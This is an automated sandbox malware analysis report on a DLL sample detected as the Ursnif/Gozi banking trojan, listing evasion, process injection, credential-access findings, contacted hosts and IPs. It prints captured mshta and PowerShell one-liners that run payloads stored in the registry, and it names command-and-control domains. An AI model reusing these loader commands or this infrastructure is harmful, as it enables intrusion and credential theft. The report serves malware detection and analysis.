Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3011
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6004
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rgcvdt5c\rgcvdt5c.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\czjkgrnh\czjkgrnh.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7064 Thread sleep count: 42 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7064 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A5E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_00A5E0BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_00A6888D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A74FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_00A74FE1
Source: C:\Windows\explorer.exe Code function: 38_2_03B5B9E8 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 38_2_03B5B9E8
Source: C:\Windows\explorer.exe Code function: 38_2_03B5ECE0 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose, 38_2_03B5ECE0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A605EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_00A605EF
Source: explorer.exe, 00000026.00000002.621856451.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000026.00000000.472035912.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: mshta.exe, 0000001B.00000003.419853645.000001F45AAA6000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000026.00000000.477391550.000000000DCC9000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000026.00000002.617365934.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000026.00000000.472597369.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000026.00000000.472035912.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000026.00000000.472035912.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: mshta.exe, 0000001B.00000003.419853645.000001F45AAA6000.00000004.00000001.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000026.00000000.472597369.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 00000026.00000000.472035912.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6FC77 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 1_2_00A6FC77
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A716A5 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 1_2_00A716A5

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\System32\control.exe base: 920000 protect: page execute and read and write Jump to behavior
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\rgcvdt5c\rgcvdt5c.0.cs Jump to dropped file
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 9B851580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: EB2000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 7FFA9B851580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 3080000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 7FFA9B851580 value: 40
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\regsvr32.exe Thread register set: target process: 5996 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3472
Source: C:\Windows\explorer.exe Thread register set: target process: 4016
Source: C:\Windows\explorer.exe Thread register set: target process: 4288
Source: C:\Windows\explorer.exe Thread register set: target process: 4448
Source: C:\Windows\explorer.exe Thread register set: target process: 5792
Source: C:\Windows\explorer.exe Thread register set: target process: 1460
Source: C:\Windows\System32\control.exe Thread register set: target process: 3472
Source: C:\Windows\System32\control.exe Thread register set: target process: 6516
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7C63B12E0 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 920000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7C63B12E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: EB2000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 3080000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\czjkgrnh\czjkgrnh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rgcvdt5c\rgcvdt5c.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3F68.tmp' 'c:\Users\user\AppData\Local\Temp\czjkgrnh\CSCEF1F6125AF8B42719A491BF8DBE92E8.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES515A.tmp' 'c:\Users\user\AppData\Local\Temp\rgcvdt5c\CSC108898B256644579B55FCCE99117812A.TMP'
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: explorer.exe, 00000026.00000000.459198424.0000000001640000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000026.00000000.459198424.0000000001640000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000026.00000000.459198424.0000000001640000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000026.00000000.458953977.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000026.00000000.459198424.0000000001640000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000026.00000000.459198424.0000000001640000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A604D7 cpuid 1_2_00A604D7
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6B585 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 1_2_00A6B585
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A5A027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 1_2_00A5A027
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A67AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 1_2_00A67AFF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6B1E7 GetLastError,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,GetVersion,GetModuleHandleA, 1_2_00A6B1E7
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.362515361.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.475600162.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362460411.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.456841690.0000000000470000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362409571.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.398940574.0000000004C6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.464100297.000002179E910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.473286008.0000000002AD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.629508039.000000000679E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362501622.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362480640.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362433705.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362526268.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.454805795.000002746FF10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.622819473.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362379436.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.477760036.000000000089E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5292, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5720, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Tries to steal Mail credentials (via file access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.362515361.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.475600162.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362460411.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.456841690.0000000000470000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362409571.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.398940574.0000000004C6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.464100297.000002179E910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.473286008.0000000002AD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.629508039.000000000679E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362501622.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362480640.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362433705.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362526268.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.454805795.000002746FF10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.622819473.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362379436.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.477760036.000000000089E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5292, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5720, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 343315 Sample: crypt_3300.dll Startdate: 22/01/2021 Architecture: WINDOWS Score: 100 58 resolver1.opendns.com 2->58 72 Multi AV Scanner detection for domain / URL 2->72 74 Found malware configuration 2->74 76 Malicious sample detected (through community Yara rule) 2->76 78 10 other signatures 2->78 9 mshta.exe 2->9         started        12 loaddll32.exe 1 2->12         started        signatures3 process4 signatures5 92 Suspicious powershell command line found 9->92 14 powershell.exe 9->14         started        18 regsvr32.exe 12->18         started        20 cmd.exe 1 12->20         started        process6 file7 54 C:\Users\user\AppData\Local\...\rgcvdt5c.0.cs, UTF-8 14->54 dropped 56 C:\Users\user\AppData\...\czjkgrnh.cmdline, UTF-8 14->56 dropped 94 Injects code into the Windows Explorer (explorer.exe) 14->94 96 Writes to foreign memory regions 14->96 98 Modifies the context of a thread in another process (thread injection) 14->98 106 2 other signatures 14->106 22 explorer.exe 14->22 injected 26 csc.exe 14->26         started        29 csc.exe 14->29         started        31 conhost.exe 14->31         started        100 Detected Gozi e-Banking trojan 18->100 102 Allocates memory in foreign processes 18->102 104 Maps a DLL or memory area into another process 18->104 108 2 other signatures 18->108 33 control.exe 18->33         started        35 iexplore.exe 1 86 20->35         started        signatures8 process9 dnsIp10 60 c56.lepini.at 22->60 62 api3.lepini.at 22->62 80 Tries to steal Mail credentials (via file access) 22->80 82 Changes memory attributes in foreign processes to executable or writable 22->82 84 Modifies the context of a thread in another process (thread injection) 22->84 86 Disables SPDY (HTTP compression, likely to perform web injects) 22->86 50 C:\Users\user\AppData\Local\...\czjkgrnh.dll, PE32 26->50 dropped 37 cvtres.exe 26->37         started        52 C:\Users\user\AppData\Local\...\rgcvdt5c.dll, PE32 29->52 dropped 39 cvtres.exe 29->39         started        88 Maps a DLL or memory area into another process 33->88 90 Creates a thread in another existing process (thread injection) 33->90 41 iexplore.exe 145 35->41         started        44 iexplore.exe 29 35->44         started        46 iexplore.exe 29 35->46         started        48 iexplore.exe 35->48         started        file11 signatures12 process13 dnsIp14 64 img.img-taboola.com 41->64 66 tls13.taboola.map.fastly.net 151.101.1.44, 443, 49735, 49736 FASTLYUS United States 41->66 70 7 other IPs or domains 41->70 68 api10.laptok.at 45.138.24.6, 49753, 49754, 49755 SPECTRAIPSpectraIPBVNL Turkey 44->68
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.138.24.6
 unknown Turkey
62068 SPECTRAIPSpectraIPBVNL true
151.101.1.44
 unknown United States
54113 FASTLYUS false

Contacted Domains

Name IP Active
contextual.media.net 2.18.68.31 true
tls13.taboola.map.fastly.net 151.101.1.44 true
hblg.media.net 2.18.68.31 true
c56.lepini.at 45.138.24.6 true
lg3.media.net 2.18.68.31 true
